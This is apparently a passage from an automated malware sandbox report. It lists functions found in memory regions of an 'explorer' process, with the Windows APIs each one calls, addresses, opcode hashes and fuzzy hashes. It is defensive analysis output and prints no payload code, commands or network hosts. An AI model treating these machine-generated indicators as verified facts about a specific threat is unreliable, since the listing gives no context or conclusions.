                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08A213F8
                                                                                                                                                                                                                                    • Part of subcall function 08A1F265: _getptd_noexit.LIBCMT ref: 08A1F26B
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08A214AA
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08A214B6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2542811309.0000000008A00000.00000040.00000001.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_8a00000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$DestructExceptionObject$_getptd_noexit
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1546832303-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                                  • Instruction ID: aff2d3248ed8a31f12bd07710e4c427ec48647423dc8c79f60f3ef104b7ffdc6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF315878218A04CFCB68EF5CC451B69B3E1FB98322F51455DD48A83B51DB31F842CB82
                                                                                                                                                                                                                                  Function 0AE513F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0AE5141B
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0AE514A5
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0AE513F8
                                                                                                                                                                                                                                    • Part of subcall function 0AE4F265: _getptd_noexit.LIBCMT ref: 0AE4F26B
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0AE514AA
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0AE514B6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2548665098.000000000AE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0AE30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ae30000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$DestructExceptionObject$_getptd_noexit
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1546832303-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                                  • Instruction ID: fce1f2ea2f7546484349390dfd11bccb18f3731b99cff9c4b68fdb90a1104097
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74319E34218B058FD764EF28E441B69B3E1FF98724F25655DD88AC3352DB31E842CB82
                                                                                                                                                                                                                                  Function 0B3113F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0B31141B
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0B3114A5
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0B3113F8
                                                                                                                                                                                                                                    • Part of subcall function 0B30F265: _getptd_noexit.LIBCMT ref: 0B30F26B
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0B3114AA
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0B3114B6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2549414053.000000000B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b2f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$DestructExceptionObject$_getptd_noexit
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1546832303-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                                  • Instruction ID: c4db24e7b39c91bff3eb97ffb78552ad29159ecad6c2a2f652cc0b457fbf3aad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6319E34618B048FC768EF18D452BA9B3F5FF98720F61495DD48AD3251DB31E842CB82
                                                                                                                                                                                                                                  Function 0E0E4F60 Relevance: 10.6, APIs: 7, Instructions: 65stringsleepCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 0E0E4FBF
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: EnterCriticalSection.KERNEL32 ref: 0E0D9248
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: RtlInitializeCriticalSection.NTDLL ref: 0E0D9255
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: lstrcpyA.KERNEL32 ref: 0E0D928A
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: lstrcpyA.KERNEL32 ref: 0E0D92AD
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: lstrcatA.KERNEL32 ref: 0E0D92BD
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: lstrcatA.KERNEL32 ref: 0E0D92CD
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: LeaveCriticalSection.KERNEL32 ref: 0E0D9354
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: memcpy.MSVCRT ref: 0E0D936C
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: lstrlenA.KERNEL32 ref: 0E0D937A
                                                                                                                                                                                                                                  • lstrcmp.KERNEL32 ref: 0E0E4FE6
                                                                                                                                                                                                                                  • free.MSVCRT ref: 0E0E505A
                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 0E0E5065
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4292776791-0
                                                                                                                                                                                                                                  • Opcode ID: 6203a74f35660615294003d8cc9a21d14c632def7b9a5e53a8938cc604fafdb1
                                                                                                                                                                                                                                  • Instruction ID: 5f9e1f4978486095f45e95db3d7afcd649e9c737dcdb0030ccd8d6731ee37e2a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6203a74f35660615294003d8cc9a21d14c632def7b9a5e53a8938cc604fafdb1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09217131219B8089DB50DB51F8503AAB7E2FB88B84F844865EA8D57B14EF3CC544CB44
                                                                                                                                                                                                                                  Function 10204F60 Relevance: 10.6, APIs: 7, Instructions: 65stringsleepCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 10204FBF
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: EnterCriticalSection.KERNEL32 ref: 101F9248
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: RtlInitializeCriticalSection.NTDLL ref: 101F9255
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: lstrcpyA.KERNEL32 ref: 101F928A
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: lstrcpyA.KERNEL32 ref: 101F92AD
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: lstrcatA.KERNEL32 ref: 101F92BD
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: lstrcatA.KERNEL32 ref: 101F92CD
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: LeaveCriticalSection.KERNEL32 ref: 101F9354
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: memcpy.MSVCRT ref: 101F936C
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: lstrlenA.KERNEL32 ref: 101F937A
                                                                                                                                                                                                                                  • lstrcmp.KERNEL32 ref: 10204FE6
                                                                                                                                                                                                                                  • free.MSVCRT ref: 1020505A
                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 10205065
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4292776791-0
                                                                                                                                                                                                                                  • Opcode ID: 6203a74f35660615294003d8cc9a21d14c632def7b9a5e53a8938cc604fafdb1
                                                                                                                                                                                                                                  • Instruction ID: cf455c516f3ac65a15058bc79dd49b7ade832b2a43754637e6d424f388042d1e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6203a74f35660615294003d8cc9a21d14c632def7b9a5e53a8938cc604fafdb1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA21A035219B4185EB10DF11A89839EB3A6FB8CBC4F945125EACD47B18EF7CC454CB10
                                                                                                                                                                                                                                  Function 08A214ED Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2542811309.0000000008A00000.00000040.00000001.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_8a00000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd
                                                                                                                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                  • Opcode ID: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                                  • Instruction ID: 7e626eb477dc277cc821d764bbd9454fe09267d5c3b299d26b87875cf6332086
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3E0ED7D514115CFCB797B6C85093A832A0FF6D217F5A60E5D8068AE20DBBC6480CA53
                                                                                                                                                                                                                                  Function 0AE514ED Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2548665098.000000000AE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0AE30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ae30000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd
                                                                                                                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                  • Opcode ID: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                                  • Instruction ID: da29ccf739ed2562d432bf1f656e66da6c1a49c87c55d4906e4ef54b089a21fa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9E01279514106CFD7257BB8A4093A832A4FF6970AF5E72F5D8168A231D7BC84C0CE57
                                                                                                                                                                                                                                  Function 0B3114ED Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2549414053.000000000B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b2f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd
                                                                                                                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                  • Opcode ID: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                                  • Instruction ID: f7a072086712d09e7eabb0c52aab7855f5db901866921e4d501ff3aa481e19e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AE0ED7D524905CFC72D6764C40A3E832A8FF1D206F7A88A196069A660DBBC4480DA53
                                                                                                                                                                                                                                  Function 0E0F1BB8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd
                                                                                                                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                  • Opcode ID: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                                  • Instruction ID: 52c23fd6340113c23d6272e95adfffd8750170318288e39abb020a0a13052ef7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CE06D36612105DAC7596B6188143EC32E0F7D8709F869CB5C34043B11E7BC4CA28B12
                                                                                                                                                                                                                                  Function 0DF41BB8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd
                                                                                                                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                  • Opcode ID: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                                  • Instruction ID: c2bce64ee7ab39d7e93a7bf3599c16fd3f7e61e89eb3236eef40f4bfdad37771
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BE0ED36915244D6C7196B6D88443BC3B64FB9870DF87D9A6874943320EBBCC9C1CB12
                                                                                                                                                                                                                                  Function 10211BB8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd
                                                                                                                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                                  • Opcode ID: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                                  • Instruction ID: 367d2e8646c35903bc6d72a02fc71b25dc88d1527e62d6f7a14928590e21cfea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32E06D3A51424AD6C7499F20844239C32E0F78870DFB698A192010B310E7BC5AE18F12
                                                                                                                                                                                                                                  Function 0E0D47B0 Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: isdigit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2326231117-0
                                                                                                                                                                                                                                  • Opcode ID: 7fc920a29c5e5be1cc7f8e3ac7506c0d811bf2616e18a83dfe5930eede53087d
                                                                                                                                                                                                                                  • Instruction ID: 478ef7b73e8785ee0475e9ac81c0320abdfd9e733dc6aedf9d5ed9b9d7605814
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7fc920a29c5e5be1cc7f8e3ac7506c0d811bf2616e18a83dfe5930eede53087d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5521C834EAC7D286EBB49B11F85437E22D9A704FE5F84056AEA6182518DB3CCCACC741
                                                                                                                                                                                                                                  Function 0DF247B0 Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: isdigit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2326231117-0
                                                                                                                                                                                                                                  • Opcode ID: 7fc920a29c5e5be1cc7f8e3ac7506c0d811bf2616e18a83dfe5930eede53087d
                                                                                                                                                                                                                                  • Instruction ID: 7f10a97d295a7a0e517238f92314844fe8b43ae2a250acee2f1f775707850bb7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7fc920a29c5e5be1cc7f8e3ac7506c0d811bf2616e18a83dfe5930eede53087d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97210825FA4AB286FB34DB59F8943BA22D8BB20FA5F54C12FCD5283955DF9CC048C241
                                                                                                                                                                                                                                  Function 101F47B0 Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: isdigit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2326231117-0
                                                                                                                                                                                                                                  • Opcode ID: 7fc920a29c5e5be1cc7f8e3ac7506c0d811bf2616e18a83dfe5930eede53087d
                                                                                                                                                                                                                                  • Instruction ID: 96bbe51f4c61e7e5f8a1bcc882fd0e28161ef32e7e4a4bfd64ce70f5202828a5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7fc920a29c5e5be1cc7f8e3ac7506c0d811bf2616e18a83dfe5930eede53087d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB21D424AC46DB87F734DB91FAA436A3298E704FE5F420616D94186924DF2CC88CC341
                                                                                                                                                                                                                                  Function 0E0D8660 Relevance: 9.1, APIs: 6, Instructions: 73memorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3234909527-0
                                                                                                                                                                                                                                  • Opcode ID: 543581bef6e94fe27694f519775bfffcbdf9333420061ca6165c68780d132ee0
                                                                                                                                                                                                                                  • Instruction ID: df9188fc5535105fc7e80757d213e28407cbbda5ed20be81ca3f806a30f938ef
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 543581bef6e94fe27694f519775bfffcbdf9333420061ca6165c68780d132ee0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE319132204781C6EB64CF21E45135AB3E1F789BE8F448625DA5947B98DF38C849CF50
                                                                                                                                                                                                                                  Function 101F8660 Relevance: 9.1, APIs: 6, Instructions: 73memorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3234909527-0
                                                                                                                                                                                                                                  • Opcode ID: 543581bef6e94fe27694f519775bfffcbdf9333420061ca6165c68780d132ee0
                                                                                                                                                                                                                                  • Instruction ID: 392a76f63ec208eabebdc20bc69fdc8a648a2dff1384fe15409266d134fd921d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 543581bef6e94fe27694f519775bfffcbdf9333420061ca6165c68780d132ee0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1531AB32204B84C6EB50DF21E45435AB3A2F789BA8F148225DAAD4B798DF3CD489CF50
                                                                                                                                                                                                                                  Function 0E0E56F0 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3932841890-0
